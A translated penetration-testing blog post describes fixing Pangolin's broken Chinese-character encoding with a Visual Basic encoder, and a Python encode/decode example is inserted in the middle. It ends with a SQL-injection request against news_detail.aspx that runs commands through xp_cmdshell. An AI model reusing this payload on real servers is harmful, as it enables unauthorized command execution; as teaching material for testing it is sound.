Lab @ evan brings you hands-on penetration testing experience!
During a penetration test, the web root of the target site turned out to contain Chinese characters. When testing with Pangolin, a cmd command such as "dir c:\<Chinese path>" always returned an error. Analysing the outgoing packets with BurpSuite showed that Pangolin encodes Chinese characters with a URL-encoding-like scheme.
For example, the "Chinese path" is encoded as:
0xd600d000ce00c400c200b700be00b600
Obviously, each Chinese character is split into its two single bytes and each byte is padded with 00. That does not conform to the Unicode rules: in UTF-16 each Chinese character occupies exactly two bytes, and these 00 bytes should not appear.
It seems that Pangolin has a problem with its handling of Chinese characters. Since I cannot modify its binary, I can only write an encoding program myself and use it together with BurpSuite to carry out the penetration test. The following is the core code of a small program that performs the encoding; it was compiled in Visual Basic 2010 Express Edition.
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    Dim strOut As String = ""
    For I As Integer = 1 To Len(TextBox1.Text) ' traverse the input characters one by one
        ' UTF-16 code unit of the current character as a zero-padded 4-digit hex string
        ' (padding covers ASCII characters, which Hex() would otherwise return as 1 or 2 digits)
        Dim strChar As String = Right("0000" & Hex(AscW(Mid(TextBox1.Text, I, 1))), 4)
        ' swap the high and low bytes: the literal must be little-endian, otherwise MSSQL parses it incorrectly
        strChar = Mid(strChar, 3, 2) & Mid(strChar, 1, 2)
        strOut = strOut & strChar
    Next
    TextBox2.Text = "0x" & strOut.ToLower()
End Sub
After encoding the Chinese characters of the "Chinese path" with this program, the result is as follows:
0x2d4e8765ef8d845f
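The encoding the post describes is simply the string's UTF-16LE bytes written as a hex literal, which is how MSSQL reads a 0x... value into an nvarchar variable. The following Python is an added example, not code from the original post: it reproduces the encoding so the value above can be checked (the literal 0x2d4e8765ef8d845f decodes to 中文路径, the "Chinese path" of the translated text), and it goes the other way as well, decoding a hex literal back to text. The decoder also recognises the malformed shape produced by Pangolin, where each GBK byte of the character is widened to a 16-bit unit with a 00 pad, which is the form a log reviewer would see in the captured requests. The function names and the sample literals used in the `__main__` block are this example's own.

```python
# Added example (not from the original post): UTF-16LE hex literals as MSSQL reads
# them for nvarchar values, plus a decoder for literals seen in captured requests.
from typing import Tuple


def encode_nvarchar_hex(text: str) -> str:
    """Return the 0x-prefixed UTF-16LE hex literal MSSQL interprets as an nvarchar value."""
    return "0x" + text.encode("utf-16-le").hex()


def decode_nvarchar_hex(literal: str) -> Tuple[str, str]:
    """Decode a 0x... literal and return (scheme, text).

    scheme is "utf-16-le" for a well-formed literal, or "gbk-widened" when every
    second byte is 00 and the remaining bytes form valid GBK: the malformed shape
    described in the post, where each GBK byte is padded with 00 instead of the
    character being encoded as one UTF-16 code unit.
    """
    hexstr = literal[2:] if literal.lower().startswith("0x") else literal
    raw = bytes.fromhex(hexstr)
    if len(raw) % 2:
        raise ValueError("nvarchar literal must contain an even number of bytes")
    low_bytes = raw[0::2]   # first byte of each 16-bit little-endian unit
    high_bytes = raw[1::2]  # second byte of each unit
    # Every high byte zero but non-ASCII low bytes: each unit is a widened single
    # byte rather than a real code unit, so try to read the low bytes as GBK.
    if all(b == 0 for b in high_bytes) and any(b >= 0x80 for b in low_bytes):
        try:
            return "gbk-widened", low_bytes.decode("gbk")
        except UnicodeDecodeError:
            pass  # not GBK after all; fall back to a plain UTF-16LE decode
    return "utf-16-le", raw.decode("utf-16-le")


if __name__ == "__main__":
    # Constructed sample literals: the well-formed one from the post and the
    # malformed one Pangolin emitted for the same four characters.
    for lit in ("0x2d4e8765ef8d845f", "0xd600d000ce00c400c200b700be00b600", "0x4100"):
        scheme, text = decode_nvarchar_hex(lit)
        print(f"{lit}: {scheme} -> {text!r}")
    print(encode_nvarchar_hex("中文路径"))
```

The GBK check is a heuristic: a literal whose every second byte is zero and whose low bytes are all ASCII is ordinary UTF-16LE ASCII text and is decoded as such, while a run of high-bit bytes in that position is far more likely to be widened single-byte text than a sequence of Latin-1 supplement characters.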
Set Pangolin to use BurpSuite as its proxy, then use BurpSuite to send @z=??, replacing the question marks with the computed character encoding, to obtain the desired result.
<GET/news_detail.aspx? Newsid = 3941% 20; declare % 20 @ z % 20 nvarchar (4000) % 20 set % 20 @ z = ?? % 20 insert % 20 into % 20 [pangolin_test_table] (resulttxt) % 20 exec % 20master. dbo. xp_cmdshell % 20 @ z; alter % 20 table % 20 [pangolin_test_table] % 20add % 20id % 20int % 20not % 20 null % 20 identity % 20 (1.1) -- HTTP/>